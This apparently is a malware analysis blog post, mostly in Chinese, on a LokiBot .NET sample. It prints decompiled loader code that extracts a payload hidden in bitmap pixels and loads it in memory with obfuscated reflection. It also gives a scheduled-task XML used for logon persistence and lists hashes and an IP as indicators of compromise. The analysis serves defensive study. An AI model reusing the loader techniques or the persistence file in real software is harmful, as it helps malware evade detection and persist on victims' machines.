LokiBot
LokiBot#
https://0xmrmagnezi.github.io/malware analysis/LokiBot/
Sample#
bfd4e29505627b76243c4ea34c07b22af7edc00391b112e78c2dc3cf7a48d742
File Info#
Die
Capa
.Net 样本,用 dnSpy 打开后可见外层是一个图形界面框架,恶意代码藏在其中;在 Main 处跟踪 StartMenu 类的初始化
在 InitializeComponent 内,加载了资源并创建线程执行以下代码
// Fixed delay (~7 s) before anything is unpacked; presumably meant to outlast sandbox/emulator timeouts — TODO confirm.
Thread.Sleep(7021);
// The embedded resource "Viral" is a bitmap used as the carrier for the next-stage assembly.
Bitmap bm = Resources.Viral;
List<byte> data = new List<byte>();
// Exact byte length of the hidden payload; pixel extraction (F4/F6) stops once this many bytes are recovered.
int maxDataLength = 74752;
// Recovers the payload bytes from the bitmap's pixel RGB values into `data` (plain extraction, no decryption in F4/F6).
StartMenu.F4(bm, data, maxDataLength);
// Late-bound call (VB Interaction.CallByName) on the current AppDomain. The method name is assembled at run time
// as "L" + "o" + "ad" -> "Load" so the literal "Load" never appears in the IL; at run time this resolves to
// AppDomain.Load(byte[]) on the extracted bytes, i.e. an in-memory assembly load with no file written to disk.
Assembly Wr_99 = Interaction.CallByName(Thread.GetDomain(), "L" + "O".ToLower() + "ad", CallType.Get, new object[] { data.ToArray() }) as Assembly;
// Also late-bound, so no direct GetExportedTypes call is visible to static analysis.
Type[] exportedTypes = Interaction.CallByName(Wr_99, "GetExportedTypes", CallType.Method, new object[0]) as Type[];
// First exported type of the loaded stage; null if the load or the type enumeration failed.
Type airo = ((exportedTypes != null) ? exportedTypes[0] : null);
// Kept on the form; later instantiated via Activator.CreateInstance (see the debugging notes further down the page).
this.Game_Config = airo;
资源Viral
通过F4启动解密加载
// Token: 0x06000017 RID: 23 RVA: 0x00003964 File Offset: 0x00001B64
private static Color F1(Bitmap img, int p1, int p2)
{
// Thin wrapper over Bitmap.GetPixel(x, y): adds one indirection between the caller and the
// System.Drawing API (obfuscation layer, no logic of its own). p1 = column, p2 = row, as used by F6.
return img.GetPixel(p1, p2);
}
// Token: 0x06000018 RID: 24 RVA: 0x00003980 File Offset: 0x00001B80
private static int F3(Bitmap img)
{
// Thin wrapper over Bitmap.Height; used by F4 as the inner-loop bound.
return img.Height;
}
// Token: 0x06000019 RID: 25 RVA: 0x00003998 File Offset: 0x00001B98
private static void F4(Bitmap src, List<byte> b, int l)
{
// Walks the bitmap column by column (x outer, y inner) and appends each pixel's RGB bytes to `b`
// via F6 until `l` bytes have been collected (`l` is the payload length, 74752 in the caller).
// Both loop conditions re-check b.Count, so the scan stops mid-column as soon as the length is reached.
// This is steganographic extraction only; F4/F6 apply no decryption to the bytes.
int x = 0;
while (x < src.Width && b.Count < l)
{
int y = 0;
// F3(src) is Bitmap.Height, re-evaluated on every iteration.
while (y < StartMenu.F3(src) && b.Count < l)
{
StartMenu.F6(src, b, x, y, l);
y++;
}
x++;
}
}
// Token: 0x0600001A RID: 26 RVA: 0x000039F8 File Offset: 0x00001BF8
private static void F6(Bitmap src, List<byte> b, int x, int y, int l)
{
// Appends the R, G, B bytes of pixel (x, y) to `b`, truncated so the total never exceeds `l`.
Color c = StartMenu.F1(src, x, y);
// Bytes still missing from the payload.
int r = l - b.Count;
bool flag = r >= 3;
if (flag)
{
// Packs R,G,B into a 24-bit int and immediately unpacks it again: equivalent to adding
// c.R, c.G, c.B directly. The round-trip is an obfuscation/decompiler artifact, not a transform.
int v = ((int)c.R << 16) | ((int)c.G << 8) | (int)c.B;
b.Add((byte)((v >> 16) & 255));
b.Add((byte)((v >> 8) & 255));
b.Add((byte)(v & 255));
}
else
{
bool flag2 = r > 0;
if (flag2)
{
// Last, partial pixel: only the first r (1 or 2) bytes are still needed.
b.AddRange(new byte[] { c.R, c.G, c.B }.Take(r));
}
}
}
解密出的dll
debug看到dll的调用方法被赋值给Game_Config
传递之后,通过 Activator.CreateInstance(t, args) 进行实例化调用
查看dll,有混淆
大致梳理:在 GtaAIbrHXObmMm8GPA 实例化、静态对象 rq3bbHQEOKkdNrd09q.UMJYQAT7H 被创建时,构造函数 rq3bbHQEOKkdNrd09q 被调用,该构造函数执行了函数 kAOj1Y7pfP90kycNNw.rG10IIjS4v
函数 kAOj1Y7pfP90kycNNw.rG10IIjS4v 通过加载资源内的数据进行计算解密
解密后组装成为 dictionary 字典,赋值给 kAOj1Y7pfP90kycNNw.nJ10XRHxa0;调用时通过 metadata token 进行对比查表,再 GetMethod 并执行
kAOj1Y7pfP90kycNNw.nJ10XRHxa0 Count = 0x0000001D
[0] [0x04000075, 0x0600012A] System.Void NNNcIlaVTTHGM2DpRs.xHQmOOmpH6pHg4ZbSt::.cctor() /null
[1] [0x0400007A, 0x06000009] System.Void jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::FZaOOUuPv() /
[2] [0x0400007D, 0x06000002] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::lEA0fIAr0() /
[3] [0x0400007E, 0x06000005] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::DGw7NTeNK()
[4] [0x0400007F, 0x06000003] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::tZCA8AZk9() /Assembly.GetExecutingAssembly.GetName().Version.ToString()
[5] [0x04000080, 0x06000006] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::Om2dkTqQy()
[6] [0x04000081, 0x06000007] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::EZYgaiyMO()
[7] [0x04000082, 0x06000004] System.String jLlrSF0UwZC8AZk9Ja.FZaOUuOPvnEAfIAr0M::gXO9bmMm8()
[8] [0x04000083, 0x06000042] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::ssEGrke6D(System.String,System.String,System.String)
[9] [0x0400007B, 0x06000056] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::L6gRZVYre()
[10] [0x0400007C, 0x0600003C] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::pdRTRvDsW()
[11] [0x04000076, 0x0600004D] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::GpxPFEvNk() /计算
[12] [0x04000077, 0x06000043] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::Qcnk8Ab6R() /Sleep
[13] [0x04000084, 0x06000044] System.String AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::bnx5YM4I6(System.String)
[14] [0x04000078, 0x0600004C] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::Be1Mnc7Lx() /计算
[15] [0x04000085, 0x06000045] System.String AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::hfaUyPoVp(System.String)
[16] [0x04000087, 0x06000046] System.Drawing.Bitmap AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::LBT40X0ux(System.String,System.String)
[17] [0x04000089, 0x06000047] System.Byte[] AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::Dn3o570qq(System.Drawing.Bitmap)
[18] [0x0400008B, 0x06000048] System.Byte[] AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::zN0hl0lZA(System.Byte[],System.String)
[19] [0x0400008D, 0x06000049] System.Reflection.Assembly AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::I8LyUPIvs(System.Byte[])
[20] [0x0400008F, 0x0600004A] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::DsWEUoEhQ(System.Reflection.Assembly)
[21] [0x04000079, 0x0600004B] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::fEPLYkh7f() /Exit
[22] [0x04000086, 0x06000051] System.String AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::Gto2NNcIl(System.String) /return string
[23] [0x04000088, 0x06000052] System.Drawing.Bitmap AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::yTTKHGM2D(System.String,System.String) /arg2.Properties.ResourcesGetObject(arg1)
[24] [0x04000090, 0x06000054] System.Drawing.Bitmap AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::vKfv2nutI(System.Drawing.Bitmap,System.Int32,System.Int32) /return bitmap
[25] [0x0400008A, 0x06000053] System.Byte[] AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::HRsFAQSdu(System.Drawing.Bitmap) /FromBitmapTobytes
[26] [0x0400008C, 0x06000050] System.Byte[] AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::g6pbHg4Zb(System.Byte[],System.String) /Bytearry 计算
[27] [0x0400008E, 0x0600004F] System.Reflection.Assembly AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::vaH8QmOOp(System.Byte[]) /Assembly.Load
[28] [0x04000091, 0x0600004E] System.Void AK7YGuAGwNTeNKot9N.GtaAIbrHXObmMm8GPA::aoLWTBjh6(System.Object) /GetType GetMethod Invoke
执行流程是
12A 4D 43 4C 4B 42 44 45 51 46 52 47 53 54 48 50 49 4F 4A 4E
0x42 处停留较长,进入观察,发现对 exe 文件另一个资源的导入
获取第二个dll
期间还有与上方介绍类似的过程,生成 Montero
0x49 I8LyUPIvs 内,为引入的第三个 dll
759行的实例化调用跟入,得到第二个dll(Montero.dll)执行的方法
u5wyJlCJdlexnQOvPm.CttdtNZs0aZFMns15c::pHmoBIlQfq()被Invoke执行
CttdtNZs0aZFMns15c 构造函数,初始化一些字符串和一堆系统函数指针
会检查text3是否存在,不存在的话进行创建
复制本体,编辑文件权限
从 Base64 解码后保存为 xml 临时文件,用于创建计划任务(登录触发 LogonTrigger,其中 [USERID]/[LOCATION] 应为运行时替换的占位符),实现持久化
xml文件
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2014-10-25T14:27:44.8929027</Date>
<Author>[USERID]</Author>
</RegistrationInfo>
<Triggers>
<LogonTrigger>
<Enabled>true</Enabled>
<UserId>[USERID]</UserId>
</LogonTrigger>
<RegistrationTrigger>
<Enabled>false</Enabled>
</RegistrationTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId>[USERID]</UserId>
<LogonType>InteractiveToken</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>[LOCATION]</Command>
</Exec>
</Actions>
</Task>
第三个exe文件
加载后进行解密
程序被保存在 CttdtNZs0aZFMns15c.f0uAOgkXtG 中,在下方由 CttdtNZs0aZFMns15c.vyhodOMfxv() 或 cEHolDw2UC() 调用
这里有启动线程的功能,但在本次分析过程中没有被触发
该文件目前已经无法下载
https://www.virustotal.com/gui/file/825eb1a627f34c3d1fad85cb5904b5ac0fded65f677c5a85fa992e42c450fd99/community
总结#
整体调用可能因为混淆、线程、子调用、加载等关系而显得比较复杂;涉及的主要功能均可以追溯,但复杂的嵌套逻辑判断对分析影响较为严重。手法包含 delegate、call/invoke、metadata token 查表、线程、加解密计算、上传下载,目前先分析到这里
IOC#
d32a2695564662ad43686cb1e4878e3ec2dc3568
3b80a914b55f0dff916239ed4e8a878d3e34dbcd
ca8cf362bd477b163fa52d0ddc614923f8034880
2753a159f2cf160733b1ceeede1db57d2dde0375
87b9de16b8eee1d4afb1e202b277b7abac3fc3d2
94.156.177.41